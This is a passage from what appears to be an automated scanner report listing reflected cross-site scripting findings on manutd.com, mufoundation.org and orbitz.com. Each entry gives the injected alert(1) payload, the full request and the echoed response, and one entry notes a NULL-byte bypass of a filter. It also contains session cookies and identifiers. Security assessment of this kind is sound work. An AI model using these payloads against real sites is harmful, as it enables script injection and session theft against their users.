Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.8.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); website#lang=en; ASP.NET_SessionId=dsijc245bi5upj3uvvwiumrc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web7
Content-Length: 22140
Expires: Mon, 03 Oct 2011 00:01:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:01:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a href="/One-United/Forgot-Password.aspx?redirectPath=/en/Fanzone/Competition-And-Polls/Competition.aspx?id={A04F2C18-1A4F-437D-B2BF-26E32C2683B7}4d6e4"><script>alert(1)</script>e66d79da26b"
title="Forgotten your password?">
...[SNIP]...

4.343. http://www.manutd.com/Search-Results.aspx [catTxt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /Search-Results.aspx

Issue detail

The value of the catTxt request parameter is copied into the HTML document as plain text between tags. The payload a3be1<script>alert(1)</script>778a94ec988 was submitted in the catTxt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search-Results.aspx?qs=manutd_frontend&catTxt=a3be1<script>alert(1)</script>778a94ec988&searchText=xss HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/One-United.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.4.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web6
Content-Length: 18384
Cache-Control: public, max-age=600
Date: Sun, 02 Oct 2011 23:55:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<strong>&nbsp;a3be1<script>alert(1)</script>778a94ec988&nbsp;|&nbsp;xss</strong>
...[SNIP]...

4.344. http://www.manutd.com/Search-Results.aspx [searchText parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /Search-Results.aspx

Issue detail

The value of the searchText request parameter is copied into the HTML document as plain text between tags. The payload 75931<script>alert(1)</script>14fb8fbf954 was submitted in the searchText parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931<script>alert(1)</script>14fb8fbf954 HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/One-United.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.4.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web6
Content-Length: 18440
Cache-Control: public, max-age=600
Date: Sun, 02 Oct 2011 23:55:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<strong>&nbsp;All&nbsp;|&nbsp;xss75931<script>alert(1)</script>14fb8fbf954</strong>
...[SNIP]...

4.345. http://www.mufoundation.org/Search.aspx [search parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mufoundation.org
Path:   /Search.aspx

Issue detail

The value of the search request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5ea6"%3balert(1)//9b951a12e8a was submitted in the search parameter. This input was echoed as b5ea6";alert(1)//9b951a12e8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Search.aspx?search=bond%20interest%20eurob5ea6"%3balert(1)//9b951a12e8a HTTP/1.1
Host: www.mufoundation.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mufoundation.org/en/Charities.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CP=null*; __utma=1.1494158951.1317599905.1317599905.1317599905.1; __utmb=1.4.10.1317599905; __utmc=1; __utmz=1.1317599905.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: WEB-P02
Vary: Accept-Encoding
Cache-Control: no-cache, no-store
Expires: Mon, 03 Oct 2011 00:02:58 GMT
Date: Mon, 03 Oct 2011 00:02:58 GMT
Content-Length: 12312
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="descriptionTag" name="des
...[SNIP]...
<script language='Javascript'> document.getElementById('searchboxGSA').value ="bond interest eurob5ea6";alert(1)//9b951a12e8a" ; </script>
...[SNIP]...

4.346. http://www.mufoundation.org/Search.aspx [search parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mufoundation.org
Path:   /Search.aspx

Issue detail

The value of the search request parameter is copied into the HTML document as plain text between tags. The payload c1b24<script>alert(1)</script>8c54598a5cd was submitted in the search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search.aspx?search=bond%20interest%20euroc1b24<script>alert(1)</script>8c54598a5cd HTTP/1.1
Host: www.mufoundation.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mufoundation.org/en/Charities.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CP=null*; __utma=1.1494158951.1317599905.1317599905.1317599905.1; __utmb=1.4.10.1317599905; __utmc=1; __utmz=1.1317599905.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: WEB-P01
Vary: Accept-Encoding
Cache-Control: no-cache, no-store
Expires: Mon, 03 Oct 2011 00:02:59 GMT
Date: Mon, 03 Oct 2011 00:02:59 GMT
Content-Length: 12385
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="descriptionTag" name="des
...[SNIP]...
<div id="scResultsFor">
Results for:
bond interest euroc1b24<script>alert(1)</script>8c54598a5cd
</div>
...[SNIP]...

4.347. http://www.orbitz.com/App/SubmitQuickSearch [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The value of the destination request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 850cd"style%3d"x%3aexpression(alert(1))"325283acfab9491f6 was submitted in the destination parameter. This input was echoed as 850cd"style="x:expression(alert(1))"325283acfab9491f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /App/SubmitQuickSearch?z=7651&r=6bk&searchType=air&source=quick_search&searchTab=quick_search&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=+&previousBot=&currentBot=&isBot=true&isBasicDataPersistenceOnly=true&isFlex=&flightType=roundtrip&origin=BOS&destination=MIA850cd"style%3d"x%3aexpression(alert(1))"325283acfab9491f6&startDate=10%2F11%2F11&useStartCal=true&startTime=Anytime&endDate=10%2F24%2F11&useEndCal=true&endTime=Anytime&adults=1&Search.x=true HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=dc61&r=39i
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; mbox=session#1317600406536-142286#1317603970|PC#1317600406536-142286.19#1320194110|check#true#1317602170; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598608203:ss=1317596806325

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|egapp2192p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA850cd%22style%3D%22x%3Aexpression%28alert%281%29%29%22325283acfab9491f6|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:43:41 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS||10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:43:41 GMT; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:43:41 GMT
Content-Length: 160764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1
...[SNIP]...
<input type="text" name="destination" id="airDestination" class="locationInput hasError" value="MIA850CD"STYLE="X:EXPRESSION(ALERT(1))"325283ACFAB9491F6" />
...[SNIP]...

4.348. http://www.orbitz.com/App/SubmitQuickSearch [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The value of the destination request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d8a1"style%3d"x%3aexpression(alert(1))"6e49be09e98d299c6 was submitted in the destination parameter. This input was echoed as 1d8a1"style="x:expression(alert(1))"6e49be09e98d299c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /App/SubmitQuickSearch?z=bfe6&r=h&searchType=air&source=quick_search&searchTab=quick_search&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=+&previousBot=&currentBot=&isBot=true&isBasicDataPersistenceOnly=true&isFlex=&flightType=roundtrip&origin=bos&destination=mia1d8a1"style%3d"x%3aexpression(alert(1))"6e49be09e98d299c6&startDate=mm%2Fdd%2Fyy&useStartCal=true&startTime=Anytime&endDate=mm%2Fdd%2Fyy&useEndCal=true&endTime=Anytime&adults=1&Search.x=true HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; mbox=session#1317600406536-142286#1317603863|PC#1317600406536-142286.19#1320194003|check#true#1317602063; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; adRotator=true; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598467266:ss=1317596806325; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp33p|859365d23b27b43ebaadba5a; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|bos|mia1d8a1%22style%3D%22x%3Aexpression%28alert%281%29%29%226e49be09e98d299c6|mm/dd/yy|||||||||mm/dd/yy|mm/dd/yy||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:36:04 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS||mm/dd/yy|||||||||mm/dd/yy|mm/dd/yy||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:36:04 GMT; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:36:04 GMT
Content-Length: 157844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1
...[SNIP]...
<input type="text" name="destination" id="airDestination" class="locationInput hasError" value="MIA1D8A1"STYLE="X:EXPRESSION(ALERT(1))"6E49BE09E98D299C6" />
...[SNIP]...

4.349. http://www.orbitz.com/App/SubmitQuickSearch [destination parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The value of the destination request parameter is copied into the HTML document as plain text between tags. The payload bd6fc<a>fa2c330f76f was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /App/SubmitQuickSearch?z=dc61&r=39i HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 640
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=bfe6&r=h
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; mbox=session#1317600406536-142286#1317603930|PC#1317600406536-142286.19#1320194070|check#true#1317602130; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598506468:ss=1317596806325

searchType=airhotel&source=advanced&searchTab=&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=+&previousBot=&currentBot=&isBot=true&isBasicDataPersistenceOnly=true&isFlex=&flightType=roundtrip&origin=BOS&destination=MIAbd6fc<a>fa2c330f76f&startDate=10%2F04%2F11&useStartCal=true&startTimeType=Depart&startTime=Anytime&endDate=10%2F11%2F11&useEndCal=true&endTimeType=Depart&endTime=Anytime&adults=1&seniors=0&youths=0&children=0&infantsWit
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|egapp2192p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: PackagingContext=APH; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:55:35 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS||10/04/11|||||||MIA|BOS||10/11/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:55:35 GMT; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:55:35 GMT
Content-Length: 65588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1
...[SNIP]...
<p class="error">We can't find the following location: "MIAbd6fc<a>fa2c330f76f". Please check the spelling, and enter a city name or airport code.</p>
...[SNIP]...

4.350. http://www.orbitz.com/App/SubmitQuickSearch [origin parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The value of the origin request parameter is copied into the HTML document as plain text between tags. The payload 5997f<a>49d5ff584c8 was submitted in the origin parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /App/SubmitQuickSearch?z=dc61&r=39i HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 640
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=bfe6&r=h
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; mbox=session#1317600406536-142286#1317603930|PC#1317600406536-142286.19#1320194070|check#true#1317602130; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598506468:ss=1317596806325

searchType=airhotel&source=advanced&searchTab=&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=+&previousBot=&currentBot=&isBot=true&isBasicDataPersistenceOnly=true&isFlex=&flightType=roundtrip&origin=BOS5997f<a>49d5ff584c8&destination=MIA&startDate=10%2F04%2F11&useStartCal=true&startTimeType=Depart&startTime=Anytime&endDate=10%2F11%2F11&useEndCal=true&endTimeType=Depart&endTime=Anytime&adults=1&seniors=0&youths=0&child
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|egapp2192p.prod.orbitz.net; Domain=.orbitz.com; Path=/
